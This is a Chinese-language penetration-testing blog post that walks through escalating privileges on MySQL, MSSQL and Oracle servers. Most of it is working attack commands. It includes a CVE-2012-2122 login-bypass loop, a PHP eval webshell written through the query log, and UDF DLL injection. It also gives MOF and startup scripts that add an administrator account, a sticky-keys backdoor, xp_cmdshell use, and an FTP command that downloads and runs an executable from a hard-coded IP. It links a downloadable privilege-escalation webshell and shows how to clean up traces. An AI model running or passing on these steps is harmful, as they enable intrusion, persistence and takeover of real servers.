前言

資料庫許可權

在平常的滲透提權中，我們通常可以在一些特殊情況下得到資料庫的使用者名稱和密碼（最高許可權root），如下：

MySQL 3306 埠弱口令爆破
sqlmap 注入的 --sql-shell 模式
網站的資料庫配置檔案中拿到明文密碼資訊
CVE-2012-2122 等這類漏洞直接拿下 MySQL 許可權

口令爆破、sqlmap的--sql-shell模式和資料庫配置檔案中拿明文密碼已經老生常談了，這裡主要演示一下CVE-2012-2122

CVE-2012-2122

當連線MariaDB/MySQL時，輸入的密碼會與期望的正確密碼比較，由於不正確的處理，會導致即便是memcmp()返回一個非零值，也會使MySQL認為兩個密碼是相同的。 也就是說只要知道使用者名稱，不斷嘗試就能夠直接登入SQL資料庫。按照公告說法大約256次就能夠蒙對一次。

#受影響版本

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.

MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

在vunlub中啟動CVE-2012-2122環境

環境啟動後用docker ps檢視程序

可以看到啟動了一個Mysql服務（版本：5.5.23），監聽埠為3306埠，預設的root使用者的密碼為123456

我們可以使用mysql客戶端進行遠端連線資料庫

連線測試就證明我們的環境正常搭建。然後就是漏洞利用了，正常模擬攻擊者，我們是沒有密碼，不知道root的密碼為123456的，這個時候我們就可以利用CVE-2012-2122來進行身份繞過

msf可以匯出hash值

msf6 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf6 > set rhosts 192.168.178.128
msf6 > run

或者直接bash輸入

root@root:~/桌面# for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.178.128 2>/dev/null; done
Welcome to the MariaDB monitor.  Commands end with ; or
 
 \g.
Your MySQL connection id is 854
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> 

MySQL提權

Webshell許可權

into oufile 寫 shell

into oufile 寫 shell要滿足如下條件才可以寫入

1、知道網站物理路徑
2、高許可權資料庫使用者
3、load_file() 開啟 即 secure_file_priv 無限制
4、網站路徑有寫入許可權

資料庫檢視是否有secure_file_priv限制

mysql> show global variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv | NULL  |
+------------------+-------+

Value	說明
NULL	不允許匯入或匯出
/	只允許在 / 目錄匯入匯出
空	不限制目錄

在 MySQL 5.5 之前 secure_file_priv 預設是空，這個情況下可以向任意絕對路徑寫檔案

在 MySQL 5.5之後 secure_file_priv 預設是 NULL，這個情況下不可以寫檔案

利用phpmyadmin來into outfile

首先在存在phpmyadmin時，我們可以試試弱口令，root、root來進行登入phpmyadmin後臺。登入進去後我們獲取網站的絕對路徑來進行寫shell

在phpmyadmin中，我們可以利用log變數來猜測網站的絕對路徑

這裡是用phpstudy搭建的網站，所以猜測網站目錄在WWW目錄下，或者通過其他手段的資訊收集，來收集到我們的網站絕對路徑。

有了網站路徑，我們就可以執行SQL命令來進行寫shell

寫入失敗，這裡失敗的原因是因為我們前面查詢secure_file_priv值為null，所以許可權就是不允許匯入或匯出，這裡我們對secure_file_priv進行修改為空後，再進行寫入。

因為secure_file_priv為只讀許可權，所以我們開啟my.ini檔案，加入如下語句再重啟伺服器。

secure_file_priv=''

這時檢視許可權為所有目錄下可寫入

再次寫入shell，會發現成功寫入。

然後菜刀、蟻劍進行連線。

當然我麼還可以利用sqlmap進行檔案的寫入，如下：

sqlmap -u "http://x.x.x.x/?id=x" --file-write="c:/Users/suifeng/Desktop/shell.php" --file-dest="C:/phpstudy_pro/WWW/shell.php"

當然這種寫shell的方式，在MySQL 5.5之後已經很難實現了，因為MySQL 5.5之後值為NULL，在secure_file_priv沒有匯入匯出許可權的時候，我們還可以利用日誌寫shell。

利用日誌寫shell

在MySQL 5.0 版本以上會建立日誌檔案，我們可以通過修改日誌的全域性變數中的儲存位置來 getshell

mysql> SHOW VARIABLES LIKE '%general%';
+------------------+-----------------------------------------------------------------+
| Variable_name    | Value                                                           |
+------------------+-----------------------------------------------------------------+
| general_log      | OFF                                                             |
| general_log_file | C:\phpstudy_pro\Extensions\MySQL5.7.26\data\DESKTOP-1G2NI5V.log |
+------------------+-----------------------------------------------------------------+

general_log預設關閉，高許可權的使用者可以直接通過mysql命令列進行開啟，開啟後日志文件記錄使用者的每條指令，將其儲存在general_log_file中。我們可以通過開啟general_log，然後自定義general_log_file來進行getshell。

mysql> set global general_log = "ON";   #開啟general_log
mysql> set global general_log_file='c:/phpstudy_pro/www/shell.php';   #修改general_log_file路徑

再次檢視許可權

#寫入shell
mysql> select "<?php @eval($_POST['suifeng']);?>";
+-----------------------------------+
| <?php @eval($_POST['suifeng']);?> |
+-----------------------------------+
| <?php @eval($_POST['suifeng']);?> |
+-----------------------------------+

然後蟻劍連線

伺服器許可權

UDF提權

什麼是UDF

UDF(user-defined function)是MySQL的一個拓展介面，也可稱之為使用者自定義函式，它是用來拓展MySQL的技術手段，可以說是資料庫功能的一種擴充套件，使用者通過自定義函式來實現在MySQL中無法方便實現的功能，其新增的新函式都可以在SQL語句中呼叫，就像呼叫一些系統函式如version()函式便捷。

動態連結庫

提權大致方法是把我們的動態連結庫放置在特點的目錄下，建立我們自定義函式，實現系統函式命令的呼叫，最終導致提權。

在mysql<5.1 匯出目錄c:/windows或system32

在mysql>=5.1 匯出安裝目錄/lib/plugin/

在有注入點時候，我們可以通過sqlmap中裡的UDF動態連結庫進行匯入

#sqlmap中動態連結庫位置
D:\tools\sqlmap\data\udf\mysql

裡面有windows和linux且64位和32位版本，大家可以根據被攻擊器來進行選擇

sqlmap中的動態連結庫為了防止被防毒軟體查殺，都經過了編碼處理，不能直接使用，所以我們還需要用sqlmap自帶的解碼工具clock.py進行解碼

#cloak位置
D:\tools\sqlmap\extra\cloak
#解碼操作
D:\tools\sqlmap\extra\cloak>python cloak.py -d -i d:\tools\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll  #windows解碼

D:\tools\sqlmap\extra\cloak>python cloak.py -d -i d:\tools\sqlmap\data\udf\mysql\linux\64\lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so  #linux解碼

動態連結庫上傳位置

在上傳動態連結庫之前，我們要先對mysql的版本進行判斷

#判斷資料庫版本
mysql> select version();
+-----------+
| version() |
+-----------+
| 5.7.26    |
+-----------+

這裡被攻擊的靶機版本為5.7.26，所以我們要把動態連結庫上傳到安裝目錄/lib/plugin/下面，那我們可以利用如下命令查詢安裝目錄

mysql> show variables like '%plugin%';
+-------------------------------+----------------------------------------------------+
| Variable_name                 | Value                                              |
+-------------------------------+----------------------------------------------------+
| default_authentication_plugin | mysql_native_password                              |
| plugin_dir                    | C:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin\ |
+-------------------------------+----------------------------------------------------+

mysql> select @@basedir;
+-----------------------------------------+
| @@basedir |
+-----------------------------------------+
| C:\phpstudy_pro\Extensions\MySQL5.7.26\ |
+-----------------------------------------+

來到對應的目錄下並沒有發現/lib/plugin，所以我們需要自己建立一個/lib/plugin，但是真實環境下我們伺服器許可權還沒有拿下（這裡用是為了觀察直觀），所以我們可以在webshell環境下或者通過NTFS ADS流建立資料夾。

#NTFS ADS流建立語句
mysql> select 'x' into dumpfile 'C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin::$INDEX_ALLOCATION';  #建立不一定成功，不成功的情況下還是利用webshell的許可權建立目錄

建立好後我們就可以匯入我們的動態連結庫了。

匯入動態連結庫

存在sql注入時

在存在sql注入的時候，我們可以通過sqlmap來上傳動態連結庫，但是需要滿足的條件為secure_file_priv的值為空，sql注入為最高許可權，又因為 GET 有位元組長度限制，所以往往 POST 注入才可以執行這種攻擊。

python sqlmap.py -u "http://192.168.178.130/sqli-labs/Less-1/?id=1" --file-write="d:/tools/sqlmap/extra/cloak/lib_mysqludf_sys_64.dll" --file-dest="C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/lib_mysqludf_sys_64.dll"

不存在sql注入時

沒有sql注入時，我們可以通過執行sql語句來進行寫入動態連結庫，這裡需要寫入檔案，所以需要secure_file_priv為空。

#select後面為動態連結庫的十六進位制編碼（資料太長，這裡省略顯示）
SELECT 0x4d5a900003... INTO DUMPFILE 'C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/lib_mysqludf_sys_64.dll';  

動態連結庫的十六進位制可以通過mysql自帶的hex函式或者一些檔案十六進位制編碼器工具解決。當然在sql語句寫不進去的動態連結庫的時候，我們還可以通過我們的webshell來進行上傳。

檔案上傳完成後

我們就可以通過sql語句來自定義函數了

#原本執行程式碼
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll';
#修改後執行程式碼
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

本來應該執行這條命令來自定義命令的，但是一直報錯，後來我把dll檔名字修改之後，建立成功。（可能是下劃線導致函式在編譯情況下出問題）

#查詢自定義函式
mysql> select * from mysql.func;
+----------+-----+---------+----------+
| name     | ret | dl      | type     |
+----------+-----+---------+----------+
| sys_eval |   0 | udf.dll | function |
+----------+-----+---------+----------+

#建立成功後，我們利用自定義函式進行命令執行
mysql > select sys_eval('whoami');

然後用我們這個自定義命令執行函式進行提權即可。最後為了許可權維持，防止被發現，我們可以對自定義函式進行刪除。

#刪除自定義函式
mysql> drop function sys_eval;

這種手工UDF提權無疑太過繁瑣，這裡主要推薦通過網頁版一鍵提權指令碼，這裡使用的是月師傅的馬，下面是下載地址

連結：https://pan.baidu.com/s/1a5ASE2TLvnKsOUxsHKBjOw 
提取碼：v9s9

上傳後訪問

然後再匯入，執行命令即可

MOF提權

現在通過mof檔案來進行提權已經非常困難了，因為它支援提權版本只有2003和一些之前的版本。mof的提權原理為mof檔案每五秒就會執行，而且是系統許可權，我們通過mysql使用load_file 將檔案寫入/wbme/mof，然後系統每隔五秒就會執行一次我們上傳的MOF。MOF當中有一段是vbs指令碼，我們可以通過控制這段vbs指令碼的內容讓系統執行命令，進行提權。

mof指令碼如下

#pragma namespace("\\\\.\\root\\subscription") 

instance of __EventFilter as $EventFilter 
{ 
    EventNamespace = "Root\\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 

instance of ActiveScriptEventConsumer as $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user suifeng p@ssw0rd /add\")\nWSH.run(\"net.exe localgroup administrators suifeng /add\")";   #建立使用者
}; 

instance of __FilterToConsumerBinding 
{ 
    Consumer   = $Consumer; 
    Filter = $EventFilter; 
};

首先我們將我們的指令碼上傳，然後用如下命令上傳到指定目錄。

select load_file("C:/Documents and Settings/suifeng.mof") into dumpfile "c:/windows/system32/wbem/mof/suifeng.mof";

然後等待五秒後用net user命令可以看到建立的使用者

mof提權痕跡清理

因為每隔幾秒鐘時間又會重新執行新增使用者的命令，所以想要清理痕跡得先暫時關閉 winmgmt 服務再刪除相關 mof 檔案

#停止winmgmt服務
net stop winmgmt
#刪除Repository資料夾
rmdir /s /q C:\Windows\system32\wbem\Repository\
#重新啟動服務
net start winmgmt

啟動項提權

MySQL的啟動項提權，原理就是通過mysql把一段vbs指令碼匯入到系統的啟動項下，如果管理員啟動或者重啟的伺服器，那麼該指令碼就會被呼叫，並執行vbs腳本里面的命令。

以下是啟動項路徑

#2003
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
#2008
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

有了路徑我們在mysql的shell下輸入如下程式碼

create table a (cmd text); 
insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 
insert into a values ("a=wshshell.run (""cmd.exe /c net user suifeng p@ssw0rd /add"",0) " ); 
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators suifeng /add"",0) " ); 
select * from a into outfile "C:\\Documents and Settings\\All Users\\「開始」選單\\程式\\啟動\\a.vbs";

然後我們在對應路徑下就可以看到我們的vbs指令碼了

然後重啟，即可發現vbs腳本里面建立的使用者。

CVE-2016-6663、CVE-2016-6664組合提權

在一些Mysql小於5.5.51或小於5.6.32或小於5.7.14及衍生版本，我們都可以利用CVE-2016-6663、CVE-2016-6664組合對其進行測試提權。

1、利用CVE-2016-6663將www-data許可權提升為mysql許可權：

cd /var/www/html/
gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
./mysql-privesc-race test 123456 localhost testdb

2、利用CVE-2016-6664將Mysql許可權提升為root許可權：

wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
chmod 777 mysql-chowned.sh
./mysql-chowned.sh /var/log/mysql/error.log

MSSQL提權

mssql提權前期要做的工作和mysql提權一樣，這裡就不再過多的敘述了，主要介紹一下提權方法。

mssql提權必知基本命令

select @@version   #檢視資料庫版本
select db_name()   #檢視當前資料庫
select IS_SRVROLEMEMBER('sysadmin')  #判斷是否為sa許可權
select IS_MEMBER('db_owner')  #判斷是否為dba許可權
exec master..xp_msver    #檢視資料庫系統引數

#開啟xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

#關閉xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure;

#禁用advanced options
EXEC sp_configure 'show advanced options',0;GO RECONFIGURE;

#sp_OACreate執行命令
DECLARE @js int
EXEC sp_OACreate 'ScriptControl',@js OUT
EXEC sp_OASetProperty @js,'Language','JavaScript'
ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'

#sp_OACreate移動檔案
declare @aa int
exec sp_oacreate 'scripting.filesystemobject' @aa out
exec sp_oamethod @aa, 'moveFile',null,'c:\temp\ipmi.log','c:\temp\ipmi1.log';

#sp_OACreate複製檔案
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';

#sp_OACreate刪除檔案
DECLARE @Result int
DECLARE @FSO_Token int
EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT
EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile',NULL,'c:\Documents and Settings\All Users\ [開始] 選單\程式\啟動\user.bat'
EXEC @Result = sp_OADestrop @FSO_Token

mssql提權必知許可權管理

1.bulkadmin:這個角色可以執行BULK INSERT語句.該語句允許從文字檔案中將資料匯入到SQL Server2008資料庫中,為需要執行大容量插入到資料庫的域帳號而設計.
2.dbcreator:這個角色可以建立,更改,刪除和還原任何資料庫.不僅適合助理DBA角色,也可能適合開發人員角色.
3.diskadmin:這個角色用於管理磁碟檔案,比如映象資料庫和新增備份裝置.適合助理DBA
4.processadmin:SQL Server 2008可以同時多程序處理.這個角色可以結束程序(在SQL Server 2008中稱為"刪除")
5.public:有兩大特點:第一,初始狀態時沒有許可權;第二,所有資料庫使用者都是它的成員
6.securityadmin:這個角色將管理登入名及其屬性.可以授權,拒絕和撤銷伺服器級/資料庫級許可權.可以重置登入名和密碼
7.serveradmin:這個角色可以更改伺服器範圍的配置選項和關閉伺服器
8.setupadmin:為需要管理聯接伺服器和控制啟動的儲存過程的使用者而設計.
9.sysadmin:這個角色有權在SQL Server 2008 中執行任何操作.

xp_cmdshell提權

xp_cmdshell的作用類似於mysql的udf，其本質是一些sql語句的集合，xp_cmdshell也可以理解為一些危險性比較高的小指令碼。

xp_cmdshell在mssql2000中開啟，在2005之後就是預設禁止的，我們需要sa許可權來開啟xp_cmdshell

#開啟xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

#關閉開啟xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure

在打開了xp_cmdshell之後，我們就可以進行執行命令了

EXEC master.dbo.xp_cmdshell 'whoami'

sp_OACreate提權

當xp_cmdshell不可用的時候，我們還可以利用sc_oacreate來進行提權

#開啟sc_oacreate
EXEC sp_configure 'show advanced options', 1;  
RECONFIGURE WITH OVERRIDE;  
EXEC sp_configure 'Ole Automation Procedures', 1;  
RECONFIGURE WITH OVERRIDE;  
EXEC sp_configure 'show advanced options', 0;

1）直接加使用者
 
2000系統：
 
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 123 123 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 123/add'
 
  
 
xp和2003系統：
 
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123$ 123/add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 123$ /add'
 
  
 
2）貼上鍵替換
 
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
 
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
 
需要同時具備sp_oacreate 和sp_oamethod 兩個功能元件
 
3）直接傳馬
 
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, '%systemroot%\system32\cmd.exe /c echo open 222.180.210.113 > cmd.txt&echo 123>> cmd.txt&echo123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1.exe&1.exe&del cmd.txt. /q /f&del 1.exe /f /q'--
 
4）啟動項寫入加賬戶指令碼
 
declare @sp_passwordxieo int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:\RECYCLER\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';
 
5）如果該伺服器有網站，則直接用方法4）寫入一句話

沙盒提權

什麼是沙盒模式?

沙盒模式是資料庫的一種安全功能.在沙盒模式下,只對控制元件和欄位屬性中的安全且不含惡意程式碼的表示式求值.如果表示式不使用可能以某種方式損壞資料的函式或屬性，則可認為它是安全的.

利用條件：

1，Access可以呼叫VBS的函式，以System許可權執行任意命令

2，Access執行這個命令是有條件的，需要一個開關被開啟

3，這個開關在登錄檔裡

4，SA是有許可權寫登錄檔的

5，用SA寫登錄檔的許可權開啟那個開關

6，呼叫Access裡的執行命令方法，以system許可權執行任意命令執行SQL命令，執行了以下命令

開啟預設關閉的xp_regwrite儲存過程：

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0

利用jet.oledb執行系統命令新增系統賬號：

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')

Oracle提權

Oracle許可權分配

系統許可權

系統規定使用者使用資料庫的許可權。（系統許可權是對使用者而言)。

系統許可權分類
DBA: 擁有全部特權，是系統最高許可權，只有DBA才可以建立資料庫結構。
RESOURCE:擁有Resource許可權的使用者只可以建立實體，不可以建立資料庫結構。
CONNECT:擁有Connect許可權的使用者只可以登入Oracle，不可以建立實體，不可以建立資料庫結構。
對於普通使用者：授予connect, resource許可權。
對於DBA管理使用者：授予connect，resource, dba許可權。

實體許可權

某種許可權使用者對其它使用者的表或檢視的存取許可權。（是針對表或檢視而言的）。

實體許可權分類
select, update, insert, alter, index, delete, all //all包括所有許可權
execute//執行儲存過程許可權

Oracle提權方法

通過注入儲存過程提權（低許可權提升至DBA）

原理

SYS建立的儲存過程存在sql注入。擁有create procedure許可權的使用者通過建立提權函式，將提權函式注入到儲存過程中，於是該儲存過程將呼叫這個提權函式來執行grant dba to quan命令，獲得Oracle資料庫dba許可權。

利用條件

1、SYS建立的儲存過程存在sql注入（EG：CVE-2005-4832）

2、使用者擁有create procedure許可權（用來建立函式）

提權步驟

假設有一個使用者quan 只有 CONNECT 和 RESOURCE 許可權

手工注入

（1）使用者登陸後執行select * from session_privs檢視許可權

（2）建立函式，命令為grant dba to quan

grant execute on pwn to public;//賦予所有使用者此函式的執行許可權

SQL>create or replace function pwn return vaarchar2
authid current_user is pragma autonomous_transaction;
begin
execute immediate 'grant dba to quan';
return '';
end;
/

SQL>grant execute on pwn to public;
/
（3）注入sys.dbms_cdc_subscribe.activate_subscription

SQL>begin
sys.dbms_cdc_subscribe.activate_subscription('''||quan.pwn()||''');
end;
/

SQL>set role dba;
（4）執行select * from session_privs檢視是否為dba許可權

利用MSF注入

（1）載入攻擊模組

use auxiliary/sqli/oracle/dbms_cdc_subscribe.activate_subscription
（2）配置引數

set dbuser quan

set dbpass quan123

set sid orcl

set rhost xxxxx

set sql grant dba to quan
（3）run

2、通過utl_http.request儲存過程提權

原理

Oracle9i~11gR2中dbms_xmlquery.newcontext()和dbms_xmlquery.getxml()函式可以執行任意PL/SQL語句，利用這兩個函式可以獲得Oracle伺服器的作業系統許可權。

2.2 利用條件

1、UTL_HTTP儲存過程可用

2、Oracle9i~11gR2

提權步驟

（1）建立Java包

（2）建立儲存過程MYJAVACMD

（3）執行儲存過程，成功新增使用者

__EOF__

作者: 隨風kali
本文連結: https://www.cnblogs.com/sfsec/p/15222027.html
版權宣告: 本部落格所有文章除特別宣告外，均採用 BY-NC-SA 許可協議。轉載請註明出處！
聲援博主:如果您覺得文章對您有幫助，可以點選文章右下角【推薦】一下。您的鼓勵是博主的最大動力！